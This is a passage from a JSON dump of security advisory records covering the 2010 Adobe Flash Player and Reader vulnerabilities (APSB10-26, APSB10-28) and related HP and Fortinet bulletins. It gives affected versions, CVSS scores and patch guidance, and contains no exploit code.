"CVE-2010-3645", "CVE-2010-3646", "CVE-2010-3647", "CVE-2010-3648", "CVE-2010-3649", "CVE-2010-3650", "CVE-2010-3652", "CVE-2010-3654"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed on the Adobe security page APSB10-26, listed\nin the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially-crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially-crafted SWF content. (CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644,\nCVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649,\nCVE-2010-3650, CVE-2010-3652, CVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. Certain server\nencodings could lead to a bypass of cross-domain policy file restrictions,\npossibly leading to cross-domain information disclosure. (CVE-2010-3636)\n\nDuring testing, it was discovered that there were regressions with Flash\nPlayer on certain sites, such as fullscreen playback on YouTube. Despite\nthese regressions, we feel these security flaws are serious enough to\nupdate the package with what Adobe has provided.\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.1.102.64.\n", "modified": "2017-07-27T07:20:44", "published": "2010-11-05T04:00:00", "id": "RHSA-2010:0829", "href": "https://access.redhat.com/errata/RHSA-2010:0829", "type": "redhat", "title": "(RHSA-2010:0829) Critical: flash-plugin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:34:22", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3636", "CVE-2010-3639", "CVE-2010-3640", "CVE-2010-3641", "CVE-2010-3642", "CVE-2010-3643", "CVE-2010-3644", "CVE-2010-3645", "CVE-2010-3646", "CVE-2010-3647", "CVE-2010-3648", "CVE-2010-3649", "CVE-2010-3650", "CVE-2010-3652", "CVE-2010-3654"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed on the Adobe security page APSB10-26, listed\nin the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially-crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially-crafted SWF content. (CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644,\nCVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649,\nCVE-2010-3650, CVE-2010-3652, CVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. Certain server\nencodings could lead to a bypass of cross-domain policy file restrictions,\npossibly leading to cross-domain information disclosure. (CVE-2010-3636)\n\nDuring testing, it was discovered that there were regressions with Flash\nPlayer on certain sites, such as fullscreen playback on YouTube. Despite\nthese regressions, we feel these security flaws are serious enough to\nupdate the package with what Adobe has provided.\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.1.102.64.\n", "modified": "2018-06-07T09:04:34", "published": "2010-11-10T05:00:00", "id": "RHSA-2010:0867", "href": "https://access.redhat.com/errata/RHSA-2010:0867", "type": "redhat", "title": "(RHSA-2010:0867) Critical: flash-plugin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:11", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3654", "CVE-2010-4091"], "description": "Adobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nThis update fixes two vulnerabilities in Adobe Reader. These\nvulnerabilities are detailed on the Adobe security page APSB10-28, listed\nin the References section. A specially-crafted PDF file could cause Adobe\nReader to crash or, potentially, execute arbitrary code as the user running\nAdobe Reader when opened. (CVE-2010-3654, CVE-2010-4091)\n\nAll Adobe Reader users should install these updated packages. They contain\nAdobe Reader version 9.4.1, which is not vulnerable to these issues. All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.\n", "modified": "2018-06-07T09:04:26", "published": "2010-12-01T05:00:00", "id": "RHSA-2010:0934", "href": "https://access.redhat.com/errata/RHSA-2010:0934", "type": "redhat", "title": "(RHSA-2010:0934) Critical: acroread security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "Security update available for Adobe Flash Player\r\n\r\nRelease date: November 4, 2010\r\n\r\nVulnerability identifier: APSB10-26\r\n\r\nCVE number: CVE-2010-3636, CVE-2010-3637, CVE-2010-3638, CVE-2010-3639, CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652, CVE-2010-3654, CVE-2010-3976\r\n\r\nPlatform: All Platforms\r\nSummary\r\n\r\nCritical vulnerabilities have been identified in Adobe Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, Linux, and Solaris, and Adobe Flash Player 10.1.95.1 for Android. These vulnerabilities, including CVE-2010-3654 referenced in Security Advisory APSA10-05, could cause the application to crash and could potentially allow an attacker to take control of the affected system.\r\n\r\nAdobe recommends users of Adobe Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, Linux, and Solaris update to Adobe Flash Player 10.1.102.64. We expect to make available an update for Flash Player 10.x for Android by November 9, 2010.\r\nAffected software versions\r\n\r\n * Adobe Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, Linux, and Solaris\r\n * Adobe Flash Player 10.1.95.1 for Android\r\n\r\nTo verify the version of Adobe Flash Player installed on your system, access the About Flash Player page, or right-click on content running in Flash Player and select &quot;About Adobe &#40;or Macromedia&#41; Flash Player&quot; from the menu. If you use multiple browsers, perform the check for each browser you have installed on your system.\r\nSolution\r\n\r\nAdobe recommends all users of Adobe Flash Player 10.1.85.3 and earlier versions upgrade to the newest version 10.1.102.64 by downloading it from the Adobe Flash Player Download Center. Windows users can install the update via the auto-update mechanism within the product when prompted.\r\n\r\nFor users who cannot update to Flash Player 10.1.102.64, Adobe has developed a patched version of Flash Player 9, Flash Player 9.0.289.0, which can be downloaded from here.\r\nSeverity rating\r\n\r\nAdobe categorizes this as a critical update and recommends affected users update their installations to the newest versions.\r\nDetails\r\n\r\nCritical vulnerabilities have been identified in Adobe Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, Linux, and Solaris, and Adobe Flash Player 10.1.95.1 for Android. These vulnerabilities, including CVE-2010-3654 referenced in Security Advisory APSA10-05, could cause the application to crash and could potentially allow an attacker to take control of the affected system.\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution &#40;CVE-2010-3654&#41;.\r\n\r\nThis update resolves an input validation issue vulnerability that could lead to a bypass of cross-domain policy file restrictions with certain server encodings &#40;CVE-2010-3636&#41;.\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution &#40;ActiveX only&#41; &#40;CVE-2010-3637&#41;.\r\n\r\nThis update resolves an information disclosure vulnerability &#40;Macintosh platform, Safari browser only&#41; &#40;CVE-2010-3638&#41;.\r\n\r\nThis update resolves a Denial of Service vulnerability. Arbitrary code execution has not been demonstrated, but may be possible &#40;CVE-2010-3639&#41;.\r\n\r\nThis update resolves multiple memory corruption vulnerabilities that could lead to code execution:\r\n\r\n * &#40;CVE-2010-3640&#41;\r\n * &#40;CVE-2010-3641&#41;\r\n * &#40;CVE-2010-3642&#41;\r\n * &#40;CVE-2010-3643&#41;\r\n * &#40;CVE-2010-3644&#41;\r\n * &#40;CVE-2010-3645&#41;\r\n * &#40;CVE-2010-3646&#41;\r\n * &#40;CVE-2010-3647&#41;\r\n * &#40;CVE-2010-3648&#41;\r\n * &#40;CVE-2010-3649&#41;\r\n * &#40;CVE-2010-3650&#41;\r\n * &#40;CVE-2010-3652&#41;\r\n\r\nThis update resolves a library-loading vulnerability that could lead to code execution &#40;CVE-2010-3976&#41;.\r\n\r\nAdobe recommends users of Adobe Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, Linux, and Solaris update to Adobe Flash Player 10.1.102.64. We expect to make available an update for Flash Player 10.x for Android by November 9, 2010.\r\n\r\nAffected software\r\n\t\r\n\r\nRecommended player update\r\n\t\r\n\r\nAvailability\r\n\r\nFlash Player 10.1.85.3 and earlier\r\n\t\r\n\r\n10.1.102.64\r\n\t\r\n\r\nFlash Player Download Center\r\n\r\nFlash Player 10.1.85.3 and earlier - network distribution\r\n\t\r\n\r\n10.1.102.64\r\n\t\r\n\r\nFlash Player Licensing\r\n\r\nFlash Professional CS5, Flash CS4 Professional and Flex 4\r\n\t\r\n\r\n10.1.102.64\r\n\t\r\n\r\nFlash Player Support Center\r\n\r\nFlash CS3 Professional and Flex 3\r\n\t\r\n\r\n9.0.289.0\r\n\t\r\n\r\nFlash Player Support Center\r\n\r\n \r\nAcknowledgments\r\n\r\nAdobe would like to thank the following individuals and organizations for reporting the relevant issues and for working with Adobe to help protect our customers:\r\n\r\n * Tokuji Akamine of Symantec Consulting Services Japan &#40;CVE-2010-3636&#41;\r\n * Xiaopeng Zhang of Fortinet&#39;s FortiGuard Labs &#40;CVE-2010-3637&#41;\r\n * Erik Osterholm of Texas A&amp;M University &#40;CVE-2010-3638&#41;\r\n * Matthew Scott Bergin of Smash The Stack and Bergin Pen. Testing &#40;CVE-2010-3639&#41;\r\n * Will Dormman of CERT &#40;CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652&#41;\r\n * Simon Raner of ACROS Security &#40;CVE-2010-3976&#41;\r\n", "edition": 1, "modified": "2010-11-08T00:00:00", "published": "2010-11-08T00:00:00", "id": "SECURITYVULNS:DOC:25089", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25089", "title": "Security update available for Adobe Flash Player", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:39", "bulletinFamily": "software", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "Multiple memory corruptions, code executions, crossite access, information leak, DoS.", "edition": 1, "modified": "2010-11-08T00:00:00", "published": "2010-11-08T00:00:00", "id": "SECURITYVULNS:VULN:11239", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11239", "title": "Adobe Flash Player multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:40", "bulletinFamily": "software", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2011-1543", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2011-1542", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02738731\r\nVersion: 1\r\n\r\nHPSBMA02663 SSRT100428 rev.1 - HP Systems Insight Manager &#40;SIM&#41; for HP-UX, Linux,\r\nand Windows, Remote Cross Site Scripting &#40;XSS&#41;, Cross Site Request Forgery &#40;CSRF&#41;,\r\nExecution of Arbitrary Code, Denial of Service &#40;DoS&#41;\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as\r\npossible.\r\n\r\nRelease Date: 2011-04-19\r\nLast Updated: 2011-04-19\r\n\r\nPotential Security Impact: Remote cross site scripting &#40;XSS&#41;, cross site request\r\nforgery &#40;CSRF&#41;, execution of arbitrary code, Denial of Service &#40;DoS&#41;\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified in HP Systems Insight\r\nManager &#40;SIM&#41; for HP-UX, Linux, and Windows. The vulnerabilities could be exploited\r\nremotely resulting in cross site scripting &#40;XSS&#41;, cross site request forgery &#40;CSRF&#41;,\r\nexecution of arbitrary code, and Denial of Service &#40;DoS&#41;.\r\n\r\nReferences: CVE-2010-3636\r\n Adobe Flash Player\r\n\r\nCVE-2010-3637\r\n Adobe Flash Player\r\n\r\nCVE-2010-3638\r\n Adobe Flash Player\r\n\r\nCVE-2010-3639\r\n Adobe Flash Player\r\n\r\nCVE-2010-3640\r\n Adobe Flash Player\r\n\r\nCVE-2010-3641\r\n Adobe Flash Player\r\n\r\nCVE-2010-3642\r\n Adobe Flash Player\r\n\r\nCVE-2010-3643\r\n Adobe Flash Player\r\n\r\nCVE-2010-3644\r\n Adobe Flash Player\r\n\r\nCVE-2010-3645\r\n Adobe Flash Player\r\n\r\nCVE-2010-3646\r\n Adobe Flash Player\r\n\r\nCVE-2010-3647\r\n Adobe Flash Player\r\n\r\nCVE-2010-3648\r\n Adobe Flash Player\r\n\r\nCVE-2010-3649\r\n Adobe Flash Player\r\n\r\nCVE-2010-3650\r\n Adobe Flash Player\r\n\r\nCVE-2010-3652\r\n Adobe Flash Player\r\n\r\nCVE-2010-3976\r\n Adobe Flash Player\r\n\r\nCVE-2011-1542\r\n XSS\r\n\r\nCVE-2011-1543\r\n CSRF\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Systems Insight Manager &#40;SIM&#41; for HP-UX, Linux, and Windows prior to v6.3\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2010-3636 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2010-3637 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2010-3638 &#40;AV:N/AC:M/Au:N/C:P/I:N/A:N&#41; 4.3\r\nCVE-2010-3639 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2010-3640 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2010-3641 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2010-3642 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2010-3643 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2010-3644 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2010-3645 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2010-3646 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2010-3647 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2010-3648 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2010-3649 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2010-3650 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2010-3652 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2010-3976 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2011-1542 &#40;AV:N/AC:M/Au:N/C:N/I:P/A:N&#41; 4.3\r\nCVE-2011-1543 &#40;AV:N/AC:M/Au:N/C:N/I:P/A:N&#41; 4.3\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided HP SIM v6.3 or subsequent to resolve the vulnerabilities.\r\n\r\nHP SIM v6.3 for HP-UX, Linux, and Windows\r\n\r\nHP SIM v6.3 for HP-UX, Linux, and Windows is available here:\r\nhttp://h18013.www1.hp.com/products/servers/management/hpsim/\r\n\r\nHP SIM v6.3 for Windows on Insight Software DVD\r\n\r\nIn addition for Windows HP SIM v6.3 is available on DVD images. These are available\r\nfor download here.\r\nhttp://h18013.www1.hp.com/products/servers/management/fpdownload.html\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\nFor HP-UX, install HP SIM v6.3 or subsequent\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that\r\nreplaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP\r\nand lists recommended actions that may apply to a specific HP-UX system. It can also\r\ndownload patches and create a depot automatically. For more information see:\r\nhttps://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS\r\n\r\nHP-UX B.11.23\r\nHP-UX B.11.31\r\n=============\r\nSysMgmtServer.MX-CMS\r\nSysMgmtServer.MX-CORE\r\nSysMgmtServer.MX-CORE-ARCH\r\nSysMgmtServer.MX-CORE-ARCH\r\nSysMgmtServer.MX-PORTAL\r\nSysMgmtServer.MX-REPO\r\nSysMgmtServer.MX-TOOLS\r\naction: install HP SIM v6.3 or subsequent\r\n\r\nEND AFFECTED VERSIONS\r\n\r\nHISTORY\r\nVersion: 1 &#40;rev.1&#41; - 19 April 2011 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed\r\non systems running HP software products should be applied in accordance with the\r\ncustomer&#39;s patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product,\r\nsend Email to: security-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to\r\nHP be encrypted using PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via\r\nEmail:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&amp;langcode=USENG&amp;jumpid=in_SC-GEN__driverITRC&amp;topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber&#39;s choice for Business: sign-in.\r\nOn the web page: Subscriber&#39;s Choice: your profile summary - use Edit Profile to\r\nupdate appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing &amp; Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain\r\nsystem integrity. HP is continually reviewing and enhancing the security features of\r\nsoftware products to provide customers with current secure solutions.\r\n\r\n&quot;HP is broadly distributing this Security Bulletin in order to bring to the\r\nattention of users of the affected HP products the important security information\r\ncontained in this Bulletin. HP recommends that all users determine the applicability\r\nof this information to their individual situations and take appropriate action. HP\r\ndoes not warrant that this information is necessarily accurate or complete for all\r\nuser situations and, consequently, HP will not be responsible for any damages\r\nresulting from user&#39;s use or disregard of the information provided in this Bulletin.\r\nTo the extent permitted by law, HP disclaims all warranties, either express or\r\nimplied, including the warranties of merchantability and fitness for a particular\r\npurpose, title and non-infringement.&quot;\r\n\r\nCopyright 2011 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or\r\nomissions contained herein. The information provided is provided &quot;as is&quot; without\r\nwarranty of any kind. To the extent permitted by law, neither HP or its affiliates,\r\nsubcontractors or suppliers will be liable for incidental,special or consequential\r\ndamages including downtime cost; lost profits;damages relating to the procurement of\r\nsubstitute products or services; or damages for loss of data, or software\r\nrestoration. The information in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced herein\r\nare trademarks of Hewlett-Packard Company in the United States and other countries.\r\nOther product and company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAk2t3CsACgkQ4B86/C0qfVnGsACfUBtF4ovPqqT+9fmlstfGZOEg\r\nYs0AoM8ROq3gELhOLCPEYCca+qCkf+pn\r\n=x5Sc\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-04-21T00:00:00", "published": "2011-04-21T00:00:00", "id": "SECURITYVULNS:DOC:26202", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26202", "title": "[security bulletin] HPSBMA02663 SSRT100428 rev.1 - HP Systems Insight Manager &#40;SIM&#41; for HP-UX, Linux, and Windows, Remote Cross Site Scripting &#40;XSS&#41;, Cross Site Request Forgery &#40;CSRF&#41;, Execution of Arbitrary Code, Denial of Se", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:41", "bulletinFamily": "software", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2011-1543", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2011-1542", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "Crossite scripting, crossite request forgery, DoS.", "edition": 1, "modified": "2011-04-21T00:00:00", "published": "2011-04-21T00:00:00", "id": "SECURITYVULNS:VULN:11619", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11619", "title": "HP Systems Insight Manager multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-3637"], "description": "[FG-VD-10-020]Adobe Flash Player Remote Memory corruption Vulnerability\r\n\r\n\r\nFortinet Discovers Adobe Flash Player Vulnerability\r\n2010.Nov.04\r\n\r\nSummary:\r\n\r\n Fortinet&#39;s FortiGuard Labs has discovered a Memory corruption vulnerability in Adobe Flash Player&#40;Flash10h.ocx&#41;, which may lead to\r\narbitrary code \r\nexecution or Denial of Service.\r\n\r\nImpact:\r\n\r\n Arbitrary Code Execution or Denial of Service\r\n\r\nRisk:\r\n\r\n High\r\n\r\nAffected Software:\r\n\r\n Adobe Flash Player 10 all versions\r\n Adobe Flash Professional\r\n\r\nAdditional Information:\r\n\r\n A potential remote code execution vulnerability exists in Adobe Flash Player10&#40;Flash10h.ocx&#41;.\r\n It&#39;ll crash browser when Adobe Flash Player&#40;Flash10h.ocx&#41; tries playing a malicious flv video. \r\n\r\nSolutions:\r\n\r\n * Users should apply the solution provided by Adobe&#40;APSB10-26 http://www.adobe.com/support/security/bulletins/apsb10-26.html &#41;. \r\n\r\n * FortiGuard Labs released a signature to protect against this vulnerability.\r\n\r\n\r\nFortinet customers who subscribe to Fortinet\u2019s intrusion prevention &#40;IPS&#41; service should be protected against this vulnerability.\r\nFortinet\u2019s IPS service is one component of FortiGuard Subscription Services, which also offer comprehensive solutions such as antivirus,\r\nWeb content filtering and antispam capabilities. These services enable protection against threats on both application and network layers.\r\nFortiGuard Services are continuously updated by the FortiGuard Global Security Research Team, which enables Fortinet to deliver a\r\ncombination of multi-layered security intelligence and true zero-day protection from new and emerging threats. These updates are\r\ndelivered to all FortiGate, FortiMail and FortiClient products. Fortinet strictly follows responsible disclosure guidelines to ensure\r\noptimum protection during a threat&#39;s lifecycle. \r\n\r\nReferences: \r\n\r\nAdobe Security Bulletin: http://www.adobe.com/support/security/bulletins/apsb10-26.html\r\nCVE ID: CVE-2010-3637 &#40;FG-VD-10-020&#41; \r\n\r\nAcknowledgment:\r\n\r\nXiaopeng Zhang of Fortinet&#39;s FortiGuard Labs\r\n\r\nDisclaimer:\r\n\r\nAlthough Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the\r\naccuracy or completeness of the information. More specific information is available on request from Fortinet. Please note that Fortinet&#39;s\r\nproduct information does not constitute or contain any guarantee, warranty or legally binding representation, unless expressly identified\r\nas such in a duly signed writing.\r\n\r\nAbout Fortinet &#40; www.fortinet.com &#41;:\r\n\r\nFortinet is the pioneer and leading provider of ASIC-accelerated unified threat management, or UTM, security systems, which are used by\r\nenterprises and service providers to increase their security while reducing total operating costs. Fortinet solutions were built from the\r\nground up to integrate multiple levels of security protection--including firewall, antivirus, intrusion prevention, VPN, spyware\r\nprevention and anti-spam -- designed to help customers protect against network and content level threats. Leveraging a custom ASIC and\r\nunified interface, Fortinet solutions offer advanced security functionality that scales from remote office to chassis-based solutions\r\nwith integrated management and reporting. Fortinet solutions have won multiple awards around the world and are the only security products\r\nthat are certified in six programs by ICSA Labs: &#40;Firewall, Antivirus, IPSec, SSL, Network IPS, and Anti-Spyware&#41;. Fortinet is privately\r\nheld and based in Sunnyvale, California.\r\n\r\n\r\n", "edition": 1, "modified": "2010-11-08T00:00:00", "published": "2010-11-08T00:00:00", "id": "SECURITYVULNS:DOC:25091", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25091", "title": "[FG-VD-10-020]Adobe Flash Player Remote Memory corruption Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-2500", "CVE-2010-2215", "CVE-2010-3648", "CVE-2008-4546", "CVE-2010-4010", "CVE-2010-2160", "CVE-2010-1449", "CVE-2010-1832", "CVE-2009-0796", "CVE-2010-3640", "CVE-2010-1845", "CVE-2010-2161", "CVE-2010-1841", "CVE-2010-3786", "CVE-2009-0946", "CVE-2010-1846", "CVE-2010-3785", "CVE-2010-1843", "CVE-2010-3796", "CVE-2010-1833", "CVE-2010-2176", "CVE-2010-3790", "CVE-2010-2941", "CVE-2010-2177", "CVE-2010-2484", "CVE-2010-3798", "CVE-2010-1205", "CVE-2010-2186", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-0434", "CVE-2010-2531", "CVE-2010-1844", "CVE-2010-1828", "CVE-2010-3789", "CVE-2010-3654", "CVE-2010-2174", "CVE-2010-1836", "CVE-2010-2166", "CVE-2010-1834", "CVE-2010-2807", "CVE-2010-1450", "CVE-2010-1847", "CVE-2010-3053", "CVE-2010-2808", "CVE-2010-2173", "CVE-2010-2884", "CVE-2010-2188", "CVE-2010-1842", "CVE-2010-0212", "CVE-2010-2165", "CVE-2010-1840", "CVE-2010-2170", "CVE-2010-0001", "CVE-2010-3645", "CVE-2010-0408", "CVE-2010-3638", "CVE-2010-3788", "CVE-2010-2171", "CVE-2010-2520", "CVE-2010-2805", "CVE-2010-2249", "CVE-2010-2806", "CVE-2010-2184", "CVE-2010-1752", "CVE-2010-2182", "CVE-2010-3652", "CVE-2010-3784", "CVE-2010-3794", "CVE-2010-1811", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3793", "CVE-2010-3054", "CVE-2010-2181", "CVE-2010-3797", "CVE-2010-2163", "CVE-2010-0105", "CVE-2010-2519", "CVE-2010-3976", "CVE-2010-1803", "CVE-2010-2183", "CVE-2010-1850", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-3791", "CVE-2010-2169", "CVE-2010-1831", "CVE-2010-1297", "CVE-2010-2213", "CVE-2010-3650", "CVE-2010-1378", "CVE-2010-2179", "CVE-2010-2498", "CVE-2010-2172", 